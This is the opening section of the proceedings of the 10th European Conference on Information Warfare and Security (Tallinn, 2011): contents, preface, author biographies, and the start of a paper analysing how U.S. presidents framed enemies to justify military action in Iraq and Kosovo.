(in) Security - Academic Conferences Limited

Proceedings
of the
10th European Conference
on Information Warfare and
Security
The Institute of Cybernetics at the
Tallinn University of Technology
Tallinn, Estonia
7-8 July 2011
Edited by
Rain Ottis
Cooperative Cyber Defence
Centre of Excellence
Tallinn, Estonia

Copyright The Authors, 2011. All Rights Reserved.
No reproduction, copy or transmission may be made without written permission from the individual authors.
Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper
abstracts were read and selected by the conference panel for submission as possible papers for the
conference.
Many thanks to the reviewers who helped ensure the quality of the full papers.
These Conference Proceeding have been submitted to the Thomson ISI for indexing.
Further copies of this book can be purchased from http://academic-conferences.org/2-proceedings.htm
ISBN: 978-1-908272-07-2 CD
Published by Academic Publishing Limited
Reading
UK
44-118-972-4148
www.academic-publishing.org

Contents
Paper Title Author(s) Page
No.
Preface iv
Biographies of Conference Chairs, Programme
Chair, Keynote Speaker and Mini-track Chairs
Biographies of contributing authors vi
Legitimate Defenses Against Dangerous
Archenemies. The Justifications by U.S.
Presidents for the Initiation of Military
Operations in the Persian Gulf and Kosovo,
1991-2003
Use of Compression Methods for Data
Security Assurance
Cyber Security: Time for Engagement and
Debate
This is not a Cyber war, its a...? Wikileaks,
Anonymous and the Politics of Hegemony
Potential Threats of UAS Swarms and the
Countermeasure’s Need
Developing Intelligence in the Field of
Financing Terror - an Analytical Model of Anti-
Terror Inter Agency and Cross Border
Cooperation: The Security of Financial
Systems Dimension
A Secure Architecture for Electronic Ticketing
Based on the Portuguese e-ID Card
Evaluation of the Armed Forces Websites of
the European Countries
Estonia After the 2007 Cyber Attacks: Legal,
Strategic and Organisational Changes in
Cyber Security
Kari Alenius 1
Dominic Asamoah and William Oblitey 6
Debi Ashenden 11
David Barnard-Wills 17
Laurent Beaudoin, Antoine Gademer,
Loica Avanthey, Vincent Germain and
Vincent Vittori
v
24
Alexander Bligh 31
Paul Crocker and Vasco Nicolau 38
Pedro Cunha, Parcídio Gonçalves, Vítor
Sá, Sérgio Tenreiro de Magalhães and
Miguel Pimenta
Christian Czosseck, Rain Ottis and
Anna-Maria Talihärm
An Usage-Centric Botnet Taxonomy Christian Czosseck and Karlis Podins 65
User-Centric Information Security Systems - A
Living lab Approach
Intrusion Detection Through Keystroke
Dynamics
The Computer Security of Public/Open
Computer Spaces: Feedback of a Field Study
in Europe
Perverting eMails: A new Dimension in Internet
(in)Security
Evaluating Cyber Security Awareness in South
Africa
Moses Dlamini , Jan Eloff, Marek
Zielinksi , Jason Chuang 1 and Danie
Smit
João Ferreira, Henrique Santos and
Bernardo Patrão
50
57
73
81
Eric Filiol 91
Eric Filiol, Jonathan Dechaux and Jean-
Paul Fizaine
Marthie Grobler, Joey Jansen van
Vuuren and Jannie Zaaiman
i
106
113

Paper Title Author(s) Page
No.
Missionaries of Peace – The Creation of the
Italian Identity in the Representation of the
Political Discussion in Favour of Italy’s
Participation in the Iraq War in Il Corriere della
Sera
Thoughts of war Theorists on Information
Operations
Live-Action Role-Play as a Scenario-Based
Training Tool for Security and Emergency
Services
Computer Games as the Representation of
Military Information Operations – A
Philosophical Description of Cyborgizing of
Propaganda Warfare
Information Security Culture or Information
Safety Culture – What do Words Convey?
Strategic Communication and Revolution in
Military Affairs: Describing Actions and Effects
A Case-Study on American Perspectives on
Cyber and Security
Evolutionary Algorithms for Optimal Selection
of Security Measures
Botnet Detection: A Numerical and Heuristic
Analysis
Analysis and Modelling of Critical
Infrastructure Systems
Modelling Relational Aspects of Critical
Infrastructure Systems
A Study on Cyber Secured eGovernance in an
Educational Institute: Performance and User
Satisfaction
Steps towards Monitoring Cyberarms
Compliance
Distributed Denial of Service Attacks as Threat
Vectors to Economic Infrastructure: Motives,
Estimated Losses and Defense Against the
HTTP/1.1 GET and SYN Floods Nightmares
Legal Protection of Digital Information in the
era of Information Warfare
Criteria for a Personal Information Security
Agent
International Criminal Cooperation in the
Context of Cyber Incidents
Methods for Detecting Important Events and
Knowledge From Data Security Logs
Marja Härmänmaa 122
Arto Hirvelä 127
Sara Hjalmarsson 132
Aki-Mauri Huhtinen 141
Ilona Ilvonen 148
Saara Jantunen 155
Saara Jantunen and Aki-Mauri Huhtinen 163
Jüri Kivimaa and Toomas Kirt 172
Luís Mendonça and Henrique Santos 185
Graeme Pye and Matthew Warren 194
Graeme Pye and Matthew Warren 202
Kasi Raju 211
Neil Rowe, Simson Garfinkel, Robert
Beverl, and Panayotis Yannakogeorgos
221
Libor Sarga and Roman Jašek 228
Małgorzata Skórzewska-Amberg 237
Ewald Stieger and Rossouw von Solms 245
Anna-Maria Talihärm 253
Risto Vaarandi 261
Locating the Enemy Marja Vuorinen 267
Australian National Critical Infrastructure
Protection: A Case Study
ii
Matthew Warren and Shona Leitch 375

Paper Title Author(s) Page
No.
PhD Papers 281
Security Considerations for Virtual Platform
Provisioning
Mudassar Aslam and Christian
Gehrmann
A Mobile and Quick Terrorism Anthony Desnos and Geoffroy Gueguen 291
Regulatory Compliance to Ensure Information
Security: Financial Supervision Perspective
Behaviour Profiling for Transparent
Authentication for Mobile Devices
Description of a Practical Application of an
Information Security Audit Framework
Fight Over Images of the State Armed Forces
and Private Security Contractors
283
Andro Kull 298
Fudong Li, Nathan Clarke, Maria
Papadaki and Paul Dowland
307
Teresa Pereira and Henrique Santos 315
Mirva Salminen 323
Non Academics 331
A Proposal for Domain Name System (DNS)
Security Metrics Framework
Andrea Rigoni and Salvatore Di Blasi 333
Work in progress 337
Malicious Flash Crash Attacks by Quote
Stuffing: This is the way the (Financial) World
Could end
iii
Robert Erra 339

Preface
This year sees the 10th European Conference on Information Warfare and Security (ECIW 2011), which is
hosted by the Institute of Cybernetics (IoC) at Tallinn University of Technology in collaboration with the
Cooperative Cyber Defence Centre of Excellence (CCD COE) in Tallinn, Estonia. The Conference Chair is
Vahur Kotkas from IoC and I am pleased to be the Programme Chair.
The Conference continues to bring together individuals working in the area of Information Warfare and
Information Security in order to share knowledge and develop new ideas with their peers. The range of
papers presented at the Conference will ensure two days of interesting discussions. The topics covered this
year illustrate the depth of the information operations’ research area, with the subject matter ranging from the
highly technical to the more strategic visions of the use and influence of information.
The opening keynote is given by Mr Raul Rebane from StratCom and the second day will be opened by Prof
Enn Tyugu from CCD COE and IoC.
With an initial submission of 83 abstracts, after the double blind, peer review process there are 53 papers
published in these Conference Proceedings. These papers come from all parts of the globe including
Australia, Austria, Egypt, Estonia, Finland, France, Germany, Greece, India, Kuwait, Pakistan, Portugal,
Romania, South Africa, Sweden, United Kingdom and the United States of America.
I wish you a most interesting conference and an enjoyable stay in Estonia.
Rain Ottis, PhD
July 2011
iv

Biographies of Conference Chairs, Programme Chairs
and Keynote Speakers
Conference Chair
Programme Chairs
Vahur Kotkas is a Development Manager of the Institute of Cybernetics at Tallinn
University of Technology, Tallinn, Estonia. His research and activities are mostly related to
engineering, modeling and simulations where Knowledge- and Logic-Based techniques are
developed and applied in order to achieve comfortable and efficent platforms for modeling
and for simulations. During the past few years Vahur has been active in Cyber Security
related research under a contract with Estonian MoD to develop suitable tools for Cyber
Defence.
Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He
previously served as a communications officer in the Estonian Defence Forces,
focusing primarily on cyber defence training and awareness issues. He is a graduate
of the United States Military Academy (BS, Computer Science) and Tallinn University
of Technology (MSc, Informatics). He gained his PhD from Tallinn University of
Technology, where his research focused on politically motivated cyber attack
campaigns by non-state actors. Other research interests include cyber conflict and
politically motivated cyber attacks.
Mini Track Chairs
Debi Ashendeni is a Senior Research Fellow within the Defence College of Management
and Technology at Cranfield University. Prior to taking up this post she was a Managing
Consultant within QinetiQ’s Trusted Information Management Department (formerly the
Defence Evaluation Research Agency). Specialising in information assurance in general,
and risk assessment in particular, other specific areas of interest include building trust for
information sharing, governance processes for information assurance and information
security awareness. Debi has worked extensively across government, defence and the
finance sector as a consultant and her work concentrates on understanding the role of individuals in ensuring
that security risks are mitigated. Debi has had a number of articles on information security published,
presented at a range of conferences and has co-authored a book for Butterworth Heinemann ‘Risk
Management for Computer Security: Protecting Your Network & Information Assets’. Her current research
examines the practice of information operations using discourse analysis.
Eric Adrien Filiol has been an officer in the French Army for 20 years. He is now head
scientist officer and professor in a research lab working for different department in
France (justice, police and defense). He holds a PhD in mathematics and computer
science, a habilitation thesis in computer science, an engineer diploma in cryptology
and has graduated from NATO in InfoOps. His research works relates to computer
security (especially computer virology and cryptanalysis) and cyber warfare with the
attacker’s mind.
Dr. Marja Härmänmaa is a university lecturer in Italian at the University of Helsinki. In
addition to Critical Discourse Analyses and critical reading, her research interests include
Italian literature and culture of the early 20th century.
Professor, LTC(G.S), Aki Huhtinen, PhD is Docent of practical philosophy in the
University of Helsinki and Docent of social consequences of media and information
technology in the University of Lapland. He is also Docent of information security and
information operations in the University of Tampere Technology. Aki works at the
Department of Leadership and Military Pedagogy at the Finnish National Defence
University.
v

Saara Jantunen has studied English language and culture in the University of Groningen
in the Netherlands and English philology in the University of Helsinki. Her research
interests are language & identity and military discourse. Jantunen currently works in
education.
Marja Vuorinen is a social historian specializing in the study of elites and power
within a theoretical framework of semiotics, text analysis and media studies. Marja
holds a Doc. Soc. Sci. from the University of Helsinki
Dr. Ken Webb first career was in government special operations including command of
strategic counter-terrorist, intelligence-gathering and unconventional warfare units.
Operations in the international security field then followed where he developed a network of
geostrategic relationships. Ken has completed an interdisciplinary PhD level government
research project into enhancing national security from terrorist groups and has also been
the counter-terrorism research leader for another Government initiative to identify and foster
multi-disciplinary research into safeguarding countries from natural, human-caused, or
accidental and terrorist acts. His exposure to and research experience is in special operations, information
warfare, national security and emergencies, organised crime and counter-terrorism.
Biographies of contributing authors (in alphabetical order)
Kari Alenius is Assistant Professor in the Department of History at the University Of Oulu, Finland. His
research interests include the history of propaganda and mental images, the history of Estonia between the
World Wars and the history of ethnic minorities.
Dominic Asamoah holds a 2009 M. Phil degree In Computer Science from the Kwame .Nkrumah University
of Science and Technology. He is a lecturer of Computer Science at that University.
Mudassar Aslam is a researcher in Swedish Institute of Computer Science (SICS) since March 2010. He is
also registered as a PhD student in Mälardalens University, Västerås. He has his Masters in Information and
Communication Systems Security from KTH. Currently, he is working on Security and Trust establishment in
virtualized environments and clouds.
David Barnard-Wills is a Research Fellow in the Department of Informatics and Sensors, Cranfield
University. He has previously worked in the School of Political Science and International Studies, the
University of Birmingham, and for the Parliamentary Office of Science and Technology. Research interests
include the politics of technology, surveillance and privacy.
Laurent Beaudoin received a PhD from Télécom Paristech in image processing and remote sensing. He
has worked in Ecole Supérieure d'Informatique d'Electronique et d'Automatique (ESIEA), a french
engineering school, since 2001. He founded in 2004 the Image and Signal Processing R&D department
(ATIS laboratory). His main research activities concern Defence and Security, exploring robots (UAS, AUV),
remote sensing and ICTs for persons with disabilities.
Alexander Bligh PhD (Columbia University, 1981) - Former advisor to the PM of Israel. President, Strategic
Objects, an international strategic consulting firm. Former Chair of the Department of Political Science and
Middle Eastern Studies, Ariel University Center, Israel, and visiting professor at Columbia University, U of
Toronto, U of Notre Dame, etc.
Joobin Choobineh has a PhD from the University of Arizona. Research areas include Information Security,
Management Information Systems, and Systems Analysis and Design. He has authored or been a coauthor
of more than fifty (50) research articles. He is an Associate Editor of INFORMS Journal on Computing and
serves on the editorial board of the International Journal of Business Information Systems.
Paul Crocker has a PhD in Mathematics from the University of Leeds, UK. After working in software
development he joined the Computer Science Department at the University of Beira Interior, Portugal. His
vi

esearch and teaching interest include Parallel Computing, Security and Operating systems. He is a member
of the Portuguese research Institute of Telecommunications.
Christian Czosseck is scientist at the CCD COE in Tallinn, Estonia. Serving in the German military for more
than 12 years, he held several information assurance positions. Christian holds a M.Sc. equivalent in
computer science and is currently PhD student at the Estonian Business School in Tallinn looking into cyber
security and botnet related issues.
Anthony Desnos is currently a PhD Student at ESIEA (Operational Cryptology and Virology Laboratory) in
Laval, France. He is involved in a number of open source security projects like Androguard. He had been
speaker in various security/virology/information warfares conferences on different topics, including hack.lu,
eicar, eciw, iawacs
Moses Dlamini received his BSc Computer Science and Mathematics at the University of Swaziland. He
received his BSc Honours and MSc in Computer Science at the University of Pretoria, where he has now
enrolled for a doctorate degree. Moses works at SAP Research Pretoria, as a PhD research associate.
Salvatore Di Blasi is an Information security professional with a solid track record in secure software design
and development; he is a Certified Professional Engineer and qualified as a ISO 27001 Lead Auditor. He
currently works at Global Cyber Security Center (GCSEC) as an information security researcher.
Robert Erra is Professor of CS and Scientific Director of the Masters in Network & Information Security at
ESIEA Paris and Laval. He is interested in developments of algorithms for information security, from
cryptanalysis of asymmetric cryptography to malware analysis.
João Ferreira is an Informatics Engineering MSc student enthusiastic about Information Security, and the
field of Biometric Security in particular. For his ongoing thesis, he is currently researching methods for
strengthening the reliability of Data Centric Security solutions.
Arto Hirvelä (Major) is an instructor (leadership) in Research Group at the Finnish National Defence
University. His research interests are information environment and information operations.
Sara Hjalmarsson is a security science honours student at Edith Cowan University of Perth, Western
Australia. Her research revolves around the application of techniques from Live-Action Role-Play (LARP) to
scenario-based training. Sara has 10 years experience as an educator, participant and organiser of LARP in
Sweden and abroad. She currently resides in Sweden.
Ilona Ilvonen is a doctoral student at Tampere University of Technology, department of Business
Information Management and Logistics. Her doctoral thesis topic is the management of knowledge security,
and the thesis is due in 2012. She has published conference papers on information security management,
knowledge management and relating topics since the year 2003.
Abhaya Induruwa PhD, FBCS, FIET, FIESL, HonFCSSL, CEng, CITP, Int. PEng, is the Programme
Director for MSc Forensic Computing and MSc Cybercrime Forensics of the Canterbury Christ Church
University, United Kingdom. His research interests include Pedagogic Issues in Cybercrime Forensics
Education & Training. His PhD supervisions include the automation of mobile phone forensic investigation.
Saara Jantunen has studied English language and culture in the University of Groningen in the Netherlands
and English philology in the University of Helsinki. Her research interests are language & identity and military
discourse. Jantunen currently works in education.
Saara Jantunen has studied English language and culture in the University of Groningen in the Netherlands
and English philology in the University of Helsinki. Her research interests are language & identity and military
discourse. Jantunen currently works in education.
Toomas Kirt is a post-doc researcher at University of Tartu. In 2007 he received a PhD from Tallinn
University of Technology. Research interests include artificial intelligence, neural networks, pattern
recognition and self-organization.
Jyri Kivimaa is a scientist at NATO Cooperative Cyber Defence Center of Excellence. He graduated from
Tallinn University of Technology in 1972 and since 2009 he is a doctoral student at the Estonian Business
School.
vii

Noora Kotilainen (Master.Soc.Sci.) is a doctoral candidate at the Helsinki University social science history
department, and is working as a visiting scholar at The Finnish Institute of International Affairs and as a
researcher at Academy of Finland research project Ethics, Politics and Emergencies -Humanitarian Frame
for Co-option and Collaboration in World Politics.
Andro Kull is a Doctoral student at the University of Tampere since 2005 and has graduated at University of
Tartu in applied informatics and Tallinn University in IT management. Last academic conference experience
is from annual Security Conference held in Last Vegas 2010. The practical side, he was linked to security
issues, and more recently in relation to financial supervision. To ensure theoretical knowledge and practical
experience, he has earned international certifications CISA, CISM, and ABCP.
Fudong Li is a PhD student within the Centre for Security, Communication and Network Research at the
University of Plymouth, where he previously completed a MRes degree on the subject of Network Systems
Engineering. His research interests are intrusion detection systems, mobile phone security, and user’s
behaviour within mobile device environment.
Luís Costa Mendonça is currently finishing the Master’s degree in Communication Networks and Services
Engineering (MERSCOM) in University of Minho. He has also been working in the IT industry for 12 year
now in areas that span from software development to Datacenter design and maintenance. In the last years
he has been digging deeper into network security.
Daniel NG, Ching WA started the career as computer programmer in 1990, and then progressing towards
ICT Security, Computer Forensics, Financial Accounting and Auditing after millennium. Recently, he starts
his PhD (Security & Forensics) in a UK reputable institute and The Hong Kong Daniel Polytechnic University,
after earning a good stock options as a corporate director in a listed entity
William Oblitey holds a 1988 Ph. D. degree in Computer and Information Sciences from the University of
Pittsburgh. He is a professor of Computer Science at the Indiana University of.Pennsylvania.
Kasi Raju is a Technical Superintendent in the Department of Computer Science and Engineering, Indian
Institute of Technology - Madras, India. Post graduation in Mathematics in Loyola college Madras (1981).
Involved in Systems and Network administration. Recentlly acquired MBA( e-Governance ), PGD ( Cyber
Laws ), PGD ( Cyber Security ) and DIP( Cyber Crime Prosecution and Defence ). Currently working in e-
Governance, Cyber Forensics and Cyber Security.
Francisco Ribeiro is a student of Masters in Computer Engineering from the University of Minho. His
specialization are "Network Engineering and Services" and "Encryption and Security of Information
Systems". Also held a research fellowship in the field of bioinformatics.
Andrea Rigoni is Director General of the Global Cyber Security Center.With a working experience of 20
years in the Information Security field, he is an expert on Cyber Security, Threat Awareness, Information
Sharing and Incident and Crisis Management. Member of different expert groups, and he is actively involved
in many International and European initiatives.
Neil Rowe is Professor of Computer Science at the U.S. Naval Postgraduate School where he has been
since 1983. He has a Ph.D. in Computer Science from Stanford University (1983). His main research
interests are the modeling of deception, information security, surveillance systems, image processing, and
data mining.
Teresa Pereira is an Assistant lecturer, Superior School of Business Studies, Polytechnic Institute of Viana
do Castelo. PhD student, Department of Information Systems, University of Minho. Graduated in
Mathematics and Computer Science, University of Minho (2002), obtained MSc degree in Information
Technologies (pre-Bologna) 2006. 2002-2004 worked as researcher in OmniPaper project (IST-2001-32174)
funded under 5th Fifth Framework Programme. Research interests: Semantic Web, Information
management, ontologies, security audit, management information systems and information systems security.
Vítor Sá holds a five-year "licentiate" degree in Systems and Informatics Engineering and a Masters in
Computer Science. Main activity has been teaching in higher education (currently at the Portuguese Catholic
University). Lived for four years in Germany as a Guest Researcher at Fraunhofer IGD. He is doing his Ph.D.
work in Biometric Authentication.
Mirva Salminen is a PhD student at the University of Tampere researching on outsourcing of the state’s
security functions. She has studied International Relations and Political Science at the University of
viii

Tampere, Military History and Strategy at the Finnish National Defence University, and Security Studies at
Aberystwyth University in the United Kingdom.
Henrique Dinis Santos has a Degree in Electric and Electronic Engineering, University of Coimbra,
Portugal, 1984, PhD in Computer Engineering, University of the Minho, Portugal. 1996. Currently Associate
Professor, Information Systems Department, University of Minho, responsible for graduate/postgraduate
courses. Supervision of several dissertations, in Information Security and Computer Architecture areas.
President of a national Technical Committee (CT 136) related with information system security standards.
1990, under ERASMUS program, teaching at University of Bristol, UK, where recognized as University
Academic staff.
Libor Sarga is a doctoral worker at Department of Statistics and Quantitative Methods, Faculty of
Management and Economics, Tomas Bata University in Zlín. His dissertation work will focus on security and
information technology applications and their effects on the virtualized economy. His personal interests
include following technology, hardware and software trends, literature along with music.
Malgorzata Skorzewska-Amberg graduated from University of Warsaw (L.L.D) as well as Warsaw
University of Technology (MSc IT). Appointed Assistant Professor 2009, Faculty of Law, Kozminski
University Warsaw. For 17 years Senior IT Lecturer, Warsaw University of Technology. Research
specialization combining two academic fields: digital data protection from legal as well as technical point of
view.
Ewald Stieger is currently studying towards an MTech IT degree at the Nelson Mandela Metropolitan
University in Port Elizabeth, South Africa. His subject of interest during the 4 th year was Information Security
and he decided to continue with research in that field. The research he is conducting is concerned with
influencing users towards more secure.
Anna-Maria Talihärm is working in the NATO Cooperative Cyber Defence Centre of Excellence (CCD COE)
Legal and Policy Branch, where her areas of research include European Union information society law, cyber
terrorism and cyber crime. She is also currently striving for a PhD degree in Tartu University, specialising in
legal aspects of cyber crime.
Risto Vaarandi received his PhD degree in Computer Engineering from Tallinn University of Technology, in
June 2005. Since May 2006, he has been holding a position of a scientist at CCD CoE. Risto's research
interests include event correlation, data mining for event logs, network security, and system monitoring.
Joey Jansen van Vuuren Research Group Leader Cyber Defence for Scientific Research, CSIR South
Africa, mainly involved in research for SANDF and Government sectors on Cyber Defence. MSc from
UNISA and researcher for 25 years. Focuses research around national security and analysis of Cyber
thread using non-quantitative modelling techniques. Actively involved in facilitating Cyber awareness
programs in South Africa
Matt Warren is the Head of School at the School of Information System, Deakin University, Australia. He has
gained international recognition for his scholarly work in the areas of Information Security, Risk Analysis,
Electronic Commerce and Information Warfare. He has authored/co-authored over 180 books, book
chapters, journal and conference papers.
ix

Legitimate Defenses Against Dangerous Archenemies: The
Justifications by U.S. Presidents for the Initiation of Military
Operations in the Persian Gulf and Kosovo, 1991-2003
Kari Alenius
University of Oulu, Finland
kari.alenius@oulu.fi
Abstract: This study will analyze how Presidents of the United States justified the initiation of military operations in
three different cases: against Iraq in the Persian Gulf in the years 1991 and 2003 and against Yugoslavia/Serbia in
Kosovo in 1999. It is evident that these justifications exploited the most classical elements of a general image of the
enemy, and mainly only those. The justifications that Presidents offered the public for the initiation of military
operations and the image that they attempted to portray of the enemy were thereby almost identical in all of the
cases. Therefore, it can be concluded that speeches were for the most part built on a theoretical basis, and they did
not necessarily have to be based on a reality of the actual country in question. Admittedly, similar features could be
found in Iraqi and Serbian actions which it was possible to utilize in the construction of an image, but the identity of
the image was first and foremost due to the identity of its use. The purpose was each time to justify why the United
States took the offensive operation far beyond its own boundaries and without being attacked itself. In this case it
was necessary to describe the actions, goals and the nature of the enemy in the most negative light, and one’s own
corresponding case was to be described in the best possible positive light. Only in this way was it possible to achieve
sufficient justification for the initiation of one’s own military operations. There was no room for bringing forth
compromises or understanding the views of the other party.
Keywords: propaganda, rhetoric, enmity, United States, Iraq, Kosovo
1. Introduction
As a theoretical basis for the formation of general images of the enemy, for instance Ofer Zur’s (1991:
345-364) outlined classification of 1991 may be used. The contents of public speeches made by U.S.
Presidents can then be compared to this theoretical model. In 1991 George Bush was President, in 1999
William (Bill) Clinton and in 2003 George W. Bush. Each of them gave 4-6 pre-prepared broad public
speeches relating to the topic just before the initiation of military operations or immediately after they had
begun.
Ofer Zur (1991: 352) has presented the logic of enemy image construction in the form of the following
chart (see Figure 1). The chart is not complete, nor is it the only possible one that can illustrate the
polarity between ‘us’ and ‘others’. To the chart presented by Zur we could add a few opposing pairs such
as ‘malicious – benevolent’. On the other hand, in Zur’s chart ‘defense department – war department’ is
actually only one practical application of the principled opposing pair ‘defensive – offensive’. It would be
possible to add almost limitless similar variations on the same theme. The chart presented by Zur is
however useful in its main characteristics and corresponds to the findings of several other researchers
(e.g. Aho, 1994; Gergen and Gergen, 1986, 124-157, 310-315; Harle, 2000: 10-18; Wunsch, 2002: 82-
85) who have also examined enemy images theoretically.
An analysis can be initiated, for example, from the opposing pair ‘barbaric – humane’, continuing to circle
the chart in a counter clockwise pattern.
Barbarity or cruelty or brutality is undoubtedly one of the traditional features attached to the enemy.
Already in ancient Greece, from where the term derived to later European use, it was a central feature by
which one’s own were separated from foreigners (Harle, 2000, 40-42). Ideas of indifference towards the
suffering of others and reluctance to respect other people’s interests (Bush, 1991-01-05; Clinton, 1999-
03-24a; Bush, 2003-03-01), in short inhumanity, are closely linked to the formation of the image of the
enemy as one of barbarity. Respectively, one’s own side behaves selflessly, respecting the dignity of
others, for instance in taking care of the well-being of civilians uninvolved in military action, regardless of
their nationality (Bush, 1991-01-16; Clinton, 1999-03-27; Bush, 2003-03-08).
‘Tyranny’ against ‘good leadership’ is a feature that when connected with the image of the enemy, is
directed before all else to the subordinates of leaders. The enemy can behave tyrannically towards
outsiders, but at the same time the ordinary citizens of the enemy country suffer even more from tyranny.
Therefore, the leaders of the enemy act contrary to the interests of their own citizens. They have come to
1

Kari Alenius
power and stayed there either through the strength of their false promises, misleading their subordinates,
or by using violence to boost their status (Bush, 1991-01-09; Clinton, 1999-03-24a; Bush, 2003-03-19).
Figure 1: Chart showing positive and negative qualities within the split of ‘us – them’, by Ofer Zur (1991:
352)
2. Applying the basic features of an evil enemy to Iraq and Yugoslavia
Thus, it can be argued that by one’s actions against the leadership of the enemy, not only the best
interests of one’s own citizenry but also those of the ordinary people of the enemy country are advanced.
According to this logic, attacking the leadership of the enemy is a good deed which selflessly serves
almost all people. The psychological threshold of eliminating dangerous individuals is also lower than if
one had to justify a crackdown on an entire people. At the same time, the possibility for success of one’s
own plans appears substantially larger.
The unreliability of the enemy is an important element especially when justifying why negotiations should
not be continued. By arguing that the other party has betrayed its promises in the past (Bush, 1991-01-
16; Clinton, 1999-03-24b; Bush, 2003-03-08) listeners are placed in a situation of no choice: the
resumption of negotiations would be pointless and stupid, because the opponent would surely violate any
possible agreements in the future also. With this logic, harder measures such as the use of military attack
appear as the only competent way in which to solve problems. Anticipating the goals and motivations of
the opponent with a suspicious and hostile tone is also one of the basic elements of the logic that
separates ‘us’ and ‘others’ (Zur, 1991: 356-358).
If the enemy is unreliable and brutal, he has more than likely committed crimes though the effect of these
basic characteristics. In these examined cases also the leadership of the enemy were directly branded as
criminals (Bush, 1990-12-24; Clinton, 1999-04-05; Bush, 2003-03-01). Indeed, by Western legal
principles no individual can be called a criminal before his case has been examined in court and he has
been convicted. Such a process had not taken place either in the case of Iraqi or Serbian leaders until
2003; therefore there was no legal basis for naming them criminals. Perhaps this is why there was no
attempt to even justify the argument in the speeches of U.S. Presidents, but it was presented merely as a
statement among other issues. Moral stigmatization was more important than legal consistency.
Of Zur’s opposites, only primitiveness did not appear as such in speeches analyzed here. However, the
idea appeared indirectly when speeches referred to the civilized world and its values. If in speeches the
civilized world was against dictators (Bush, 1991-01-08; Bush, 2003-03-01), logically the dictators
2

Kari Alenius
represented the non-civilized, primitivity. Civilization, like most other terms being analyzed, was basically
a completely subjective interpretation. It did not have universal or generally accepted criteria even in
American culture. Thanks to its being a very loaded term, civilization was nevertheless well-suited to
propagandistic use. The criteria’s basic room for interpretation was also more of an advantage than
disadvantage in propagandistic use as there was no great danger of being caught ‘misinterpreting’
civilization.
The distinction between ‘good versus evil’ can be regarded more as the sum of different components
than as an individual element separating ‘us’ and ‘others’. This is why the concept did not generally
present itself as such in the speeches of the Presidents. The only exception was George Bush’s (Bush,
1991-01-09) ‘Open Letter to College Students’ in January 1991. In it the President presented the issue by
cleanly taking advantage of dichotomy. In propagandistic use the terms ‘good’ and ‘evil’ might be
perceived as problematic due to their all-inclusiveness. Listeners may feel that their opinions are being
directed in a bothersome way, if they are placed directly in front of the broadest possible conclusion:
one’s own side is good and the enemy is evil. It is more effective to lead listeners without notice and
gradually towards the same conclusion (Taylor, 2003: 6). Therefore, it pays to construct the opponent’s
evil by referring to barbarism, unreliability, primitivity and other similar features. At the same time the
alleged evil will be more credibly justified than if the end result was stated directly.
The paired concept of ‘innocent – guilty’ frequently appeared in the speeches of the Presidents (Bush,
1991-01-05; Clinton, 1999-03-24a; Bush, 2003-03-19). It was told that the opponent was guilty of crimes,
and at the same time his victims were reported as innocent. Basically, the same considerations
previously made in analyzing the concept of crime apply to this paired concept. The opponent’s guilt was
stated indirectly by making him responsible for the outbreak or imminent outbreak of war. When one’s
side initiates military operations, according to this logic it is not an attack, but an inherent consequence of
natural law resulting from the evil deeds of the enemy. By acting the wrong way the enemy initiates
military operations against himself (Zur, 1991: 356-358). At the same time, the responsibility for human
suffering and material destruction that is always caused by war goes to the enemy.
Closely related to the aforementioned, one’s own actions are described as defensive, without exception.
Although in a tactical or operational sense the question would be about attacks against the enemy, in a
strategic sense the question is nevertheless about defence. For instance, one’s own forces defend
civilization, justice, humanity and innocent civilians (Bush, 1991-01-09; Clinton, 1999-03-27; Bush, 2003-
03-08). Respectively, the actions of the enemy are always aggressive (Bush, 1990-12-24; Clinton, 1999-
04-03; Bush, 2003-03-16), and their possible strategic motives of defence cannot be taken into public
consideration. From a moral and legal perspective defence is generally accepted, but as a rule attack is
not. At the very least demonstrating that attack is legitimate is difficult, and the outcome on the
audience’s part is unsure. Thus, it is preferable to try to demonstrate that one’s own actions are always
defensive regardless of their outward appearance, and that the actions of the opponent are aggressive.
The next two paired concepts on Zur’s chart are so close to the themes already discussed that already
presented considerations need not be repeated in their context. ‘For civil rights – oppressive’ is
essentially the same as ‘good caring leaders – tyranny’. At the same time the pair ‘defense department –
war department’ does not present anything new to the ‘defensive – offensive’ theme that was discussed
above. Instead, ‘peace’ and ‘belligerence’ (or ‘brutal expansionism’) offer additional insights.
In analyzing the Presidents speeches, on several occasions it was assured that one’s own party was only
striving for peace. Peace was also expressed as a central goal of the future (Bush, 1990-12-24, Clinton,
1999-03-24b; Bush, 2003-03-08). In turn, it was said that the enemy had already broken peace with their
expansionist activities. Furthermore, when negotiations had been offered as a means of solving
problems, the enemy had refused them on a pretext of excuses or by simply failing to react to offers
(Bush, 1991-01-16; Clinton, 1999-03-24a; Bush, 2003-03-16).
The enemy therefore does not even want peace, but war. As however one’s own side is not yet at war
with the enemy and in this sense peace prevails, it is necessary to explain to the public why peace is not
real peace. In the Presidents speeches (Bush, 1991-01-08; Clinton, 1999-03-24a; Bush, 2003-03-08) the
current state of peace is presented as false, as in its shelter the enemy is acting aggressively, is
upkeeping an unfair situation and is preparing for war. ‘Real peace’ can therefore only be achieved when
the enemy is forced to give up their evil deeds and when the current unfair situation is corrected.
Attacking the enemy is therefore the promotion of peace.
3

Kari Alenius
The last two closely related paired concepts (‘sacred – profane’ and ‘godly – atheist’) were not directly
encountered in the Presidents’ speeches. An indirect reference is apparent in the conclusions of the
speeches, in which the Presidents accordingly wish God’s blessing on their own country and people
(Bush, 1991-01-16; Clinton, 1999-03-24a; Bush, 2003-03-19). It can be theoretically read that one’s own
side was seen to be on God’s side and that one’s own objectives in this sense were sacred. The counter
party would then have to be something else, if not atheist, at least something other than being basically
secure in a real and true God. Then too the enemy’s actions were unholy.
The probable practical reason why a direct religious confrontation was avoided in speeches was related
to two points. In the case of Iraq the fact that it was world-politically dangerous to present the controversy
as a religious issue led to caution. Even if Saddam Hussein was presented as an atheist, it was possible
that bringing forth religion would have led to increasing perceptions in the world of a battle between
Christianity and Islam. In any case Saddam Hussein was formally a Muslim and Iraq was a country with a
strong Muslim majority, and it was obviously in his interests if he could have presented himself as a
champion of the Muslim faith and world against an aggressive Christian West. In the case of Kosovo,
again the conditions were not right for bringing up religion, as the Albanians were mostly Muslim and the
Serbs Christians. Mixed feelings would certainly have been aroused in the American public if statements
would have been made about fighting alongside Muslims on behalf of the right faith against Christian
enemies.
Based on what has been previously presented it can be seen that the classical elements in constructing
the image of the enemy, which Zur for instance has classified, were in active use when the Presidents of
